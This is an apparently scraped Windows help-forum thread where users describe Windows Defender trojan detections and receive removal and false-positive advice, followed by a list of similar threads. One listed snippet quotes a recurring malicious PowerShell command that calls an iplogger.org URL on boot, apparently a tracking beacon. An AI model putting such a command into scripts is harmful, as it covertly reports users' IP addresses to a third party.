Windows 10: Windows Defender Detecting Trojan

Discus and support Windows Defender Detecting Trojan in AntiVirus, Firewalls and System Security to solve the problem; i downloaded a book file yesterday and it got saved in DVD drive E when i opened it, it asked to run it to view files and i did it, after few hours... Discussion in 'AntiVirus, Firewalls and System Security' started by V.KArchana, May 13, 2020.

1. Windows Defender Detecting Trojan

i downloaded a book file yesterday and it got saved in DVD drive E when i opened it, it asked to run it to view files and i did it, after few hours window security was popping up saying threat detected and i ejected the file, but still the window security is popping up and its saying its trojan virus and after doing many scan its still the same what to do?

please help!

[Original Title: trojan virus]

:)

V.KArchana, May 13, 2020
  2. AFWS Win User

Windows Defender detects an .exe as Win32/Bitrep.A Trojan?

OK, I had this software(earlier version) on another computer and never had it detected as a Trojan. I tried installing the latest version of this software on my new computer and it got detected as "Win32/Bitrep.A" Trojan after about a week of being installed
    and Windows Defender deleted it. I tried re-downloading and then scanned the installation exe with Windows Defender and it detected it as the same Trojan. I then tried re-downloading again and Windows Defender deleted it as soon as it finished downloading.
    The earlier version installation exe wasn't detected as a Trojan. I also tried a update exe to the software that wasn't the same version and nothing was detected. It seems to be with this certain version of the software or the update to this version. The developer
    recommended installing the free version of Avast. Once installed, I scanned the installation exe with Avast and nothing was detected. Is there a Trojan with the software? According to Windows Defender there is. According to Avast there isn't.

* Moved from Windows 10/Security

3. Le Boule Win User
    After Full Scan with windows defender i got problem to remove Trojan:win32/Dynamer!ac

https://www.microsoft.com/security/...Name=Trojan:Win32/Dynamer!ac&ocid=-2147283291

If Windows Defender will not alleviate this problem, recommend you follow the suggestions in this free multi-step removal guide from Malwaretips.com. The removal tools/procedures are free. Remove Trojan:Win32/Dynamer!ac malware (Virus Removal Guide)

But…

If none of the other tools listed in the Malwaretips guide identify any malware, you are using an HP laptop and the alleged malware detection by Windows Defender is listed as
    being in the “D” Drive on the laptop then you may be seeing a “false positive” detection. Should you determine you are probably seeing a "false detection"
    suggest you post back in this thread with further information.

Good luck…

Le Boule, May 13, 2020
  4. Windows Defender Detecting Trojan

Trojan Detected in OneDrive

The odd thing is I don't even use OneDrive except to automatically upload photos from my Android phone to my desktop; nothing has been detected on the phone.
    I've run another full scan with Bitdefender and Malwarebytes Anti-Malware (free) without any further detection.
    Was just wondering if there might be other steps I need to carryout to be sure nothing spreads? Thanks!

Windows Defender Detecting Trojan [​IMG]

fracking4oil, May 13, 2020
Thema:

Windows Defender Detecting Trojan

1. Windows Defender Detecting Trojan - Similar Threads - Defender Detecting Trojan

2. Urgent: Windows Defender Not Updating After Trojan Detection

in Windows 10 Gaming
    Urgent: Windows Defender Not Updating After Trojan Detection: Hi Microsoft Community,Windows Defender flagged a trojan threat in a software I downloaded a while ago. I deleted the file, but Windows Defender is still not updating its status, even after trying the specified actions.I went further and downloaded the same file again, hoping...
  3. Urgent: Windows Defender Not Updating After Trojan Detection

in Windows 10 Software and Apps
    Urgent: Windows Defender Not Updating After Trojan Detection: Hi Microsoft Community,Windows Defender flagged a trojan threat in a software I downloaded a while ago. I deleted the file, but Windows Defender is still not updating its status, even after trying the specified actions.I went further and downloaded the same file again, hoping...
  4. Urgent: Windows Defender Not Updating After Trojan Detection

in AntiVirus, Firewalls and System Security
  5. Trojan detected

Trojan detected: Trojan detected on my PC: C:\Windows\Installer\W32/Trojan.DBH.gen!Eldorado - can anybody please help me? https://answers.microsoft.com/en-us/protect/forum/all/trojan-detected/6fc82ac0-6b75-4bb7-b7dd-3e94e95843b0
  6. Microsoft Defender Detects powershell trojan

Microsoft Defender Detects powershell trojan: everytime i boot up my machine, windows defender detects this: CmdLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -command Invoke-WebRequest -URI https://iplogger.org/1hTS97 i remove it, but it justs keeps coming back, is there a fix for this?...
  7. Windows Defender Detects Trojan, am I Protected now?

Windows Defender Detects Trojan, am I Protected now?: So my windows virus protection made a pop up today saying I had a trojan, then it was gone? I did a scan and now its gone and does not appear what does this mean? [Original Title: Virus]...
  8. Windows Defender and Trojan

Windows Defender and Trojan: Hello. I just was alerted by Windows Defender that there was a Trojan on my pc. I removed it and ran a few different anti-virus programs for peace of mind ... My question is- Does Windows Defender catch it before it can do harm? Do I need to go through and change passwords...
  9. Trojan detected by msert

Trojan detected by msert: Hi. I runned Microsoft Scanner (msert) and after a while the result was: "TrojanDownloader:JS/Nemucod → Partially eliminated." I have Windows 10 Home, 64 bit. How can I totally remove this Trojan? Thanks in advance....
  10. trojan windows defender

trojan windows defender: I change over to windows defender a few months ago and I just had my first fake trojan. I just go to very safe sites and got hit with the fake trojan, sorry, forgot to write any info down. I had seen it before on friends computers and cleaned it out, it wants you to call...